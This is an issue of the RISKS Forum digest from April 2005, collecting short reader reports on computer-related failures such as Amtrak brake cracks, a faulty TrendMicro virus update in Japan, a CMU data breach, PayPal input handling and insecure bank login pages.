RISKS-LIST: Risks-Forum Digest Tuesday 26 April 2005 Volume 23 : Issue 85
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/23.85.html>
The current issue can be found at
<http://www.csl.sri.com/users/risko/risks.txt>
Contents:
Amtrak's high-speed Acela trains sidelined until summer (Monty Solomon)
Amtrak woes echo standard software engineering complaints
(Michael J Harrison)
Remote computer locks the doors, or does it? (Mark Lutton)
Hacker broke into CMU computers (Bill Schackner via Monty Solomon, Bob Heuman)
Another out-of-bounds condition that needs NO checking (David Lesher)
A large scale disruption caused by incorrect virus-definition file (Chiaki)
The risks of opening a PayPal account (Ross Anderson)
Risks of having a distinctive surname (Stefek Zaba)
SFPD officer accused of using airport cameras to ogle women (Bob Van Cleef)
Trial ID card scheme is withdrawn in Cornwall (Chris Leeson)
Steven Hauser <hause011@private>
Audit shuts down Minnesota Car License Web
Oops! US Air round trip for $1.86 (Howard M Israel)
Banks still force users to be vulnerable to ID theft (Brad Hill)
"The national phone system failed"? (Mark Brader)
Re: Michigan message board says speed limit 100 mph (Jeffrey Waters)
Re: SecurID and E*TRADE (Jonathan Lewthwaite, Kurt Raschke)
Abridged info on RISKS (comp.risks)
----------------------------------------------------------------------
Date: Thu, 21 Apr 2005 01:12:32 -0400
From: Monty Solomon <monty@private>
Subject: Amtrak's high-speed Acela trains sidelined until summer
Amtrak will not be able to run any of its high-speed trains until the summer
because of delays in getting replacement parts to correct brake problems on
Acela Express cars. The brakes were to last 1 million miles; the current
Acela fleet had about half of that mileage.
Amtrak pulled all of its 20 Acela trains out of service on Friday after
finding millimeter-size cracks in 300 of the fleet's 1,440 disc brake
rotors. Each Acela train has 72 brakes. This part is unique to the Acela
and there is no active production line casting them. Fewer than 70 disc
brakes are currently available.
[Source: The Associated Press, article by Donna De La Cruz, 20 Apr 2005;
PGN-ed]
http://www.boston.com/news/local/massachusetts/articles/2005/04/20/amtraks_high_speed_acela_trains_sidelined_until_summer/
[Amtrak had cannibalized parts from other trains to get one or
two trains able to run, but quickly abandoned that effort.
Risks of custom design and no spare parts... Risks of building a system
that really required new tracks, rather than trying to run on old
tracks... PGN]
------------------------------
Date: Tue, 19 Apr 2005 16:32:23 -0700
From: Michael J Harrison <mharrison@private>
Subject: Amtrak woes echo standard software engineering complaints
A paragraph from an op-ed in *The New York Times*, 19 Apr 2005
(http://www.nytimes.com/2005/04/19/opinion/19tierney.html):
"He chronicled the Acela mistakes, starting with Amtrak's decision to build
a new train instead of modifying an existing European one, and to build it
as a working train without first testing a prototype. The result was a long
series of problems, design changes and lawsuits between Amtrak and its
Canadian contractor, each accusing the other of botching the job."
It seems that old-fashioned mechanical engineering is not immune from the
ills commonly ascribed to its software counterpart.
------------------------------
Date: Thu, 21 Apr 2005 11:32:00 -0400
From: <Mark.Lutton@private>
Subject: Remote computer locks the doors, or does it?
I found this at http://www.stupidsecurity.com, which references
http://www.wral.com/news/4354102/detail.html
Wake County, N.C. uses a central computer to lock 50 of its buildings in
and around Raleigh. The Wake Country Animal Shelter was closed on Easter
Weekend, but the computer didn't know that. The doors were left unlocked
and several animals were stolen from the shelter.
It would be cynical of me to note that animal shelters are one service where
pilferage of the goods reduces net costs, so I won't.
------------------------------
Date: Sun, 24 Apr 2005 01:09:26 -0400
From: Monty Solomon <monty@private>
Subject: Hacker Broke Into CMU Computers (Bill Schackner)
A hacker who tapped into business school computers at Carnegie Mellon
University may have compromised sensitive personal data belonging to 5,000
to 6,000 graduate students, staff, alumni and others. The breach confirmed
by officials in the Tepper School of Business is the latest in a recent
string of campus computer break-ins nationally and the second since early
March affecting Tepper. There is no evidence that any data, including
Social Security and credit card numbers, have been misused, officials
said. But they have begun sending e-mails and letters alerting those
affected. They include graduate students and graduate degree alumni from
1997 to 2004, master's of business administration applicants from September
2002 through May 2004, doctoral applicants from 2003 to this year, and
participants in a conference that was being arranged by the school's
staff. ... [Source: Bill Schackner, *Pittsburgh Post-Gazette*, 21 Apr 2005]
http://www.post-gazette.com/pg/05111/491836.stm
------------------------------
Date: Thu, 21 Apr 2005 16:50:58 -0400
From: Bob Heuman <rsh@private>
Subject: Hacker Broke Into CMU Computers
Another case of not knowing how long the exposure existed and therefore how
much exposure the personal information really had. Once again we have Social
Security Numbers, credit card data, etc. exposed for an indeterminate amount
of time. I have gone to the university's own web site and the Tepper School
web site and neither has any mention of this report as of the time I
checked, which is Apr 21 at 4:45PM EDT.
http://kdka.com/local/local_story_111102454.html
------------------------------
Date: Thu, 21 Apr 2005 12:16:07 -0400 (EDT)
From: David Lesher <wb8foz@private>
Subject: Another out-of-bounds condition that needs NO checking
X-URL: http://www.nytimes.com/2005/04/21/nyregion/21check.html?pagewanted=print&position
*The New York Times*, 21 Apr 2005
New York City's school system recently agreed to pay $86,000 to the lawyer
of a child with autism to cover special educational services for his
client. But when the lawyer opened his mail on Tuesday, he found a check for
slightly more: $8.6 million.
{off-by-one decimal point; usual excuses cited...}
------------------------------
Date: Tue, 26 Apr 2005 02:14:34 +0900
From: Chiaki <ishikawa@private>
Subject: A large scale disruption caused by incorrect virus-definition file
It is widely reported in Japan that an errant virus definition distributed
by a anti-virus PC software company caused a large scale disruption of
businesses and individual users.
The company, TrendMicro with its headquarters in Tokyo, has been selling its
anti-virus PC software products for quite some time. Its first product was
developed in 1991.
Now, on Saturday morning 07:30 (JST), the software's automatic update site
in the Philippines released a new virus definition file which, according to
the company's comment, was not adequately tested. This file was picked up by
many users in Japan and abroad who either automatically or manually invoked
the virus definition update function of the software.
Unfortunately, Windows XP sp2 and Windows 2003 server users with this
software installed (there are a few variants of the products in the software
suite and a few of them were affected.) and updated the definition file AND
rebooted the PC after the update (as suggested by the software it seems) saw
the CPU usage go up to 100% immediately after booting and could not do much
on their PCs.
The problem was that the incorrect update caused the infinite looping of
scanning of a certain system file and no CPU time was left for any task to
do.
(If the user didn't boot and waited for another several hours, the re-worked
update file was again automagically picked up if automatic update feature
was enabled and there would be no harm.)
According to the various reports, corporate licensees include media big
names such as Asahi Shimbun newspaper, Kyodo wire news service, and
reservation division of railway company JR East. (The company put the user
number around 10 million individual users.)
I noticed that the early reports of disrupted computer network at Asahi
Shimbun and Kyodo wire service on Saturday morning and wondered what could
cause LAN disruption at such well-protected places. (It seems that DHCP
client could not get the address after boot due to the heavy CPU load inside
the anti-virus service).
After many inquiries began pouring, the company checked and released the
re-worked virus definition file. However, 170000 download took place during
the incorrect definition was at the download server. Many individual or
small business users who didn't realize the problem was caused by the virus
definition update brought their PCs to tech service companies or
re-installed the OS, etc.. Some had their disks got re-formatted.
The scale of the disruption was rather large and on Saturday evening many TV
stations carried the news of the disruption with the correct cause
identified. Some affected users who tried to `fix' their computer noticed
these news broadcasts and could now bring their PC into normal status.
The word cyberterrorism came to my mind, but it is ironical that the cause
was due to the inadequate testing at an anti-virus software corporation.
Of course, we will see whether the release of the definition file without
adequate testing was a deliberate act or simple neglect.
Lucky me: I am using Symantec Anti-Virus software on an Windows PC, and
linux on another PC. Diversity is wonderful when we can afford it.
PS: The remedy was to reboot the computer into safe-mode (after forced
power-off in many cases) and replaced the errant file and reboot. The
anti-virus software now would pick up the new corrected file.
PPS: I think I should add, in order to feel the scale of the problem, we now
know Monday morning that on Saturday,
- JR railway reservation division could not check the reservation status
(fed via network to PCs?) and so diverted (telephone) inquiring customers to
manned counters at railway stations,
- Kyodo wire service could not send out automatic wire service news for a
few hours, and so resorted to send out important news via FAX (I believe
that the initial news articles from Kyodo was sent in this manner.),
- Osaka subway system saw its computer to distribute accident information to
its stations failed to reboot, and
- Toyama city's election committee could not handle advance voting for its
mayoral and city alderman elections on their computer and had to resort to
manual processing.
These are just a part of problems reported in Japanese press Monday morning.
However, life goes on as usual as of Monday morning as far as I can tell.
(But those unfortunate companies who had suffered from the problem over the
weekend may have a hectic time right now.)
------------------------------
Date: Tue, 26 Apr 2005 16:16:33 +0100
From: Ross Anderson <Ross.Anderson@private>
Subject: The risks of opening a PayPal account
Regular RISKS readers know that many things can go wrong with naming and
authentication. Here is an interesting example.
I opened a PayPal account on the 18th April and tried to link it to a
checking account I have at a UK bank (the NatWest). The PayPal website
balked at the name of the bank branch ("Cambridge King's Parade") on the
grounds that it contained a non-ascii character. It was also too long for
the web form. All I could do was enter "Cambridge" and hope for the best.
Now it's prudent for programmers to check input, but this is rather
extreme. After all, most of the names of people and places in this world are
non-ascii. Compulsory asciification turns that inoffensive Italian, Signor
de'Ath, into the sinister Transylvanian Mr Death. Also, when I worked in
banking many years ago, a common source of fraud was that when money arrived
at the wrong branch, staff put the money into a "suspense account" while
they queried the sender. Fraud and abuse involving suspense accounts was a
serious problem.
So I tried to bring to PayPal's attention that their web page was not merely
culturally inappropriate, but also a security vulnerability. I was unable to
get their help-desk to link up successive e-mails about the issue, let alone
refer me to someone who could talk policy.
So far, so broken. I reported the incident on a local mailing list
(ukcrypto) where one of the regulars informed me that the King's Parade
branch had in fact closed, with all the customers being transferred to
another branch. This was the first I'd heard of it! I walked by my bank
branch and found it indeed closed. The two small payments that PayPal said
it would send to my bank account, to check I have access to the bank
statements, have vanished.
You just could not make this up. PayPal relies for authentication on bank
branch names, which a large UK bank will change without notifying its
customers (at least, not in any way I noticed). I won't even begin to
speculate about all the possible risks.
Ross Anderson http://www.cl.cam.ac.uk/users/rja14/
------------------------------
Date: Thu, 21 Apr 2005 19:40:59 +0100
From: Stefek Zaba <stefek.zaba@private>
Subject: Risks of having a distinctive surname
Generally, having a distinctive forename-surname combination serves me well
enough: not much chance of double-booking in hotels, and people find it easy
enough to remember. There's a privacy downside, in that once you know the
surname and city (country, even) I'm not hard to find. And I acquired the
obvious surname-related domain, zaba.com, getting on for a decade ago.
Then, about the middle of March 2005, my inbox started to attract angry
emails: "remove me from your Website immediately"! Since the www.zaba.com
page has been unchanged since my mid-1997 entry on "what I did in the UK
crypto-policy wars", I at first thought this was a new form of e-mail
address harvesting -- send an angry accusation, attract an indignant
response, email address confirmed. But few of the correspondents' addresses
seemed suspect, and when I got one from a .mil address I started filing them
away.
It took another week or so for one of the e-mails to identify, by way of a
screenshot, which website people were concerned about.
US readers will have cottoned on by now; but for The Rest Of Us: there's a
new people-searching website appeared in the US, under the name of
zabasearch.com. Frantically trying to deal with their unhelpful "optout"
procedures (which change frequently, and require you to submit personal
data!), some people hit on the idea that zaba.com would be a better place to
send emails, or Googled for the unusual word in question and found my email
address. It's since been circulated in warning messages which get passed on
in Craig Shergold fashion.
zabasearch.com themselves say they're 'only republishing publicly available
information'. RISKS readers, well-versed in notions of fair information
handling, will just about be able to grasp the distance between "on file at
the county records office", and "made available at no cost, pre-indexed by
name". What's made available for free is basic personal info - name,
address, phone numbers, years-at-address; for a fee they'll do further
background checks. All with the same rigorous attention to data quality
which has led colleagues to find themselves listed under addresses they left
several years ago, and having 30 years added to their age.
What's been interesting is receiving over a hundred angry "REMOVE ME"s, only
three or four of which identified the website in question. "Clearly", with
that website covered in Zaba-this and Zaba-that, the great majority of
correspondents observed the name coincidence and inferred identity.
Carl Ellison's "10 RISKS of PKI", and the SPKI work about the unreliability
of global naming, just got validated again, at my expense.
More gory details over at < http://www.zaba.com >
Stefek Zaba, HPLabs, Bristol, England
[Many thanks. Having a unique name sounds like a recipe for Zaba-loney.
Or maybe someone is being fed Za-baloney? PGN]
------------------------------
Date: Thu, 21 Apr 2005 12:42:08 -0700
From: Bob Van Cleef <bob@private>
Subject: SFPD officer accused of using airport cameras to ogle women
Another case of "who is watching the watchers".
According to a report on a local TV station, KTVU 2 in San Francisco, CA, a
police officer is facing possible disciplinary action for allegedly using
surveillance cameras at San Francisco International Airport to ogle women as
they walked through the terminal.
http://www.ktvu.com/news/4398749/detail.html
------------------------------
Date: Tue, 19 Apr 2005 13:33:04 +0100
From: "LEESON, Chris" <chris.leeson@private>
Subject: Trial ID card scheme is withdrawn in Cornwall
The BBC News site has an article reporting that an ID card
system being used in Cornwall has been withdrawn:
"Plans for national ID cards may need to be reconsidered following the
breakdown of a pilot project in Cornwall. The 'smart card' was tested
through the Cornish Key scheme, but now the trial is to be withdrawn,
despite an investment of £1.5m of government cash."
The withdrawal is being blamed on problems with the readers, and the system
is being replaced by a newer system with "dumber" smart cards.
http://news.bbc.co.uk/1/hi/england/cornwall/4459493.stm
------------------------------
Date: Tue, 19 Apr 2005 15:42:28 -0500 (CDT)
From: Steven Hauser <hause011@private>
Subject: Audit shuts down Minnesota Car License Web
The Minnesota Legislative Auditor report shut down a web service: Department
of Public Safety Web-based Motor Vehicle Registration Renewal System
Security Audit Security Controls as of March 2005
http://www.auditor.leg.state.mn.us/fad/2005/fad05-23.htm
The report based its audit on http://www.owasp.org/documentation/topten.html
the Open Web Application Security Project's top ten list and a previous
audit in 2001 in which the findings and recommendations were ignored.
This story was front page news in the *Saint Paul Pioneer Press* and
*Minneapolis Tribune* on 19 Apr 2005.
Other MN Department of Public Safety website shutdowns occurred from the
Minnesota Legislative Auditor include the Bureau of Criminal Apprehension's
CriMNet. The legislative auditor seems to find a lot of RISKS in the
Department of Public Safety.
Steven Hauser http://www.tc.umn.edu/~hause011/
------------------------------
Date: Tue, 19 Apr 2005 11:40:11 -0400
From: "Israel, Howard M \(Howard\)" <hisrael@private>
Subject: Oops! US Air round trip for $1.86
http://money.cnn.com/2005/04/19/news/fortune500/usair_cheap_flights/index.htm?cnn=3Dyes
Oops! US Air round trip for $1.86
Report: Carrier will honor more than 1,000 tickets sold at discounted
price due to computer glitch.
The airline also was hit by what its chief executive termed a "meltdown" of
its baggage system </2004/12/27/news/fortune500/plane_woes/> during the
Christmas holiday. That problem resulted in it sending some flights out of
its Philadelphia hub without any bags.
------------------------------
Date: Wed, 20 Apr 2005 12:52:05 -0600
From: Brad Hill <hillbrad@private>
Subject: Banks still force users to be vulnerable to ID theft
This may have been discussed before, but with the recent spate of DNS cache
poisoning attacks and fake WiFi hotspot proliferation I believe it has new
relevance.
I was actually rather shocked to find that U.S. Bank
(http://www.usbank.com/), Chase (http://www.chase.com) and Bank of America
(http://www.bankofamerica.com) all still *force* users to enter their login
and password on an insecure page. This exposes account holders to a great
risk of their credentials being stolen. The login forms on their genuine
home pages are submitted to a secure site, as they claim. The problem is
that you need security *before* you enter your data. If DNS, a router or a
proxy server anywhere along the path to their server were compromised, the
login page could be substituted for one that submits to another site or
injected with JavaScript that sends info elsewhere, asynchronously, before
it goes to the real destination. Without an SSL certificate chain there is
no way to verify that the insecure page with the form came from a trusted
source and no way short of exhaustive code inspection to tell where the form
data is actually going.
BankOne, Wells Fargo, Citi, Washington Mutual, Bank of the West, Key Bank
and Sun Trust all offer SSL versions of their login page, but for some
reason, U.S. Bank, BofA and Chase redirect to an insecure site or return an
error when trying to connect with SSL. You *can't* log in securely, even if
you try. The existence of this kind of obvious and fundamental security
mistake after all the publicity about this category of attack (note that all
these banks *do* have a user education page on phishing/fraud prevention!)
is definitely something to keep in mind when choosing a bank.
------------------------------
Date: Mon, 18 Apr 2005 20:45:00 -0400 (EDT)
From: msb@private (Mark Brader)
Subject: "The national phone system failed"? (Goodman-Jones, Risks-23.84)
> Ch7 is one of the three national commercial TV stations in Australia.
"The national phone system failed", and what RISKS hears about is a
*television* outage? Please tell me that this was just a careless wording!
Mark Brader, Toronto, msb@private
[Probably not. TV is much more visible than electricity to many people...
PGN]
------------------------------
Date: Tue, 19 Apr 2005 13:44:02 -0500
From: "Jeffrey Waters" <jwaters@private>
Subject: Re: Michigan message board says speed limit 100 mph (R 23 84)
While living in Florida, I always wondered what would happen if one
of the message boards on northbound I-95 would have said something
along the lines of "Notice - DEA Checkpoint 2 Miles"
------------------------------
Date: Mon, 25 Apr 2005 16:11:56 +0100
From: "Jonathan Lewthwaite" <JLewthwaite@private>
Subject: Re: SecurID and E*TRADE (Taft, RISKS-23.84)
Online security with usability problems?
In RISKS-23.84 Ed Taft wrote an article about the potential drawbacks of
using a keyfob device to facilitate two-factor authentication.
Ed made several observations of his experience and notes that:
"... while this appears to have good security, some potential deficiencies
come to mind: It requires more typing than the old scheme, including an
unfamiliar sequence of characters that changes every time. A better
arrangement would be for the keyfob to have a USB connector that I plug
into my computer to prove that I have the keyfob."
This 'deficiency' has already been addressed:
The solution is to allow the 'token' software to be installed on some other
device such as a USB memory stick. This can then be used to prove that the
authenticating user has the device (by plugging it in). For an example and
explanation have a look at:
http://www.passgo.com/products/softwareTokens.shtml
To maintain the two-factor authentication plugging in the device by itself
is not enough -- the user must supply something they know. As Ed noted this
is an unfamiliar sequence of characters that changes every time. With the
software token installed on your USB memory stick, supported application
ions can be configured to require a PIN allowing the challenge/response
sequence to be handled automatically.
The solution ports to other common electronics that folks have such as PDA's
and Mobile devices giving even greater freedom to the end user.
For further information on the need for strong two factor authentication =
and solutions RISK readers can follow this up at:
http://www.passgo.com/products/defender/index.shtml
Jonathan Lewthwaite Technical Account Manager www.passgo.com
------------------------------
Date: Mon, 18 Apr 2005 20:59:42 -0400
From: Kurt Raschke <kurt@private>
Subject: Re: SecurID and E*TRADE (Taft, RISKS-23.84)
Ed Taft's commentary in RISKS-23.84 on E*TRADE's apparent use of RSA's
SecurID system to authenticate users to their website raised a few points
that I think merit additional consideration.
On Ed's first point, about the added typing necessitated by the system and
his desire that it have a USB plug: Having a keyfob with a display allows
the device to be used with any sort of computer--not every computer out
there has a USB port, or one that is user-accessible. What if you log in
using a phone or a PDA?
On multiple service providers using SecurID: Theoretically this could become
a problem, but there's no reason why a trusted third party couldn't run a
copy of RSA's ACE/Server (the app used to authenticate SecurID tokens) that
others could connect to over a VPN to use for authentication. One token,
many sites. (This, though, has plenty of inherent RISKs too.)
Finally, on his point about the keyfob's battery dying: RSA has a good plan
for that--replace the unit. It's as simple as that.
Ed raises these issues as though E*TRADE is the first company to ever
implement SecurID (and they may be the first to implement it for a
public-facing service, but not the first ever), but in reality they are not
very grave issues, and many government labs and other organizations find
SecurID to be a good security method despite them
The real RISK? Weaknesses in the SecurID system:
http://www.homeport.org/~adam/dimacs.html.
------------------------------
Date: 29 Dec 2004 (LAST-MODIFIED)
From: RISKS-request@private
Subject: Abridged info on RISKS (comp.risks)
The RISKS Forum is a MODERATED digest. Its Usenet equivalent is comp.risks.
=> SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent)
if possible and convenient for you. Mailman can let you subscribe directly:
http://lists.csl.sri.com/mailman/listinfo/risks
Alternatively, to subscribe or unsubscribe via e-mail to mailman your
FROM: address, send a message to
risks-request@private
containing only the one-word text subscribe or unsubscribe. You may
also specify a different receiving address: subscribe address= ... .
You may short-circuit that process by sending directly to either
risks-subscribe@private or risks-unsubscribe@private
depending on which action is to be taken.
Subscription and unsubscription requests require that you reply to a
confirmation message sent to the subscribing mail address. Instructions
are included in the confirmation message. Each issue of RISKS that you
receive contains information on how to post, unsubscribe, etc.
INFO [for unabridged version of RISKS information]
.UK users should contact <Lindsay.Marshall@private>.
=> SPAM challenge-responses will not be honored. Instead, use an alternative
address from which you NEVER send mail!
=> The INFO file (submissions, default disclaimers, archive sites,
copyright policy, PRIVACY digests, etc.) is also obtainable from
<http://www.CSL.sri.com/risksinfo.html>
The full info file may appear now and then in future issues. *** All
contributors are assumed to have read the full info file for guidelines. ***
=> SUBMISSIONS: to risks@private with meaningful SUBJECT: line.
*** NOTE: Including the string "notsp" at the beginning or end of the subject
*** line will be very helpful in separating real contributions from spam.
*** This attention-string may change, so watch this space now and then.
=> ARCHIVES: ftp://ftp.sri.com/risks [subdirectory i for earlier volume i]
<http://www.risks.org> redirects you to Lindsay Marshall's Newcastle archive
http://catless.ncl.ac.uk/Risks/VL.IS.html gets you VoLume, ISsue.
Lindsay has also added to the Newcastle catless site a palmtop version
of the most recent RISKS issue and a WAP version that works for many but
not all telephones: http://catless.ncl.ac.uk/w/r
<http://the.wiretapped.net/security/info/textfiles/risks-digest/> .
==> PGN's comprehensive historical Illustrative Risks summary of one liners:
<http://www.csl.sri.com/illustrative.html> for browsing,
<http://www.csl.sri.com/illustrative.pdf> or .ps for printing
------------------------------
End of RISKS-FORUM Digest 23.85
************************
This archive was generated by hypermail 2.1.3 : Tue Apr 26 2005 - 18:00:24 PDT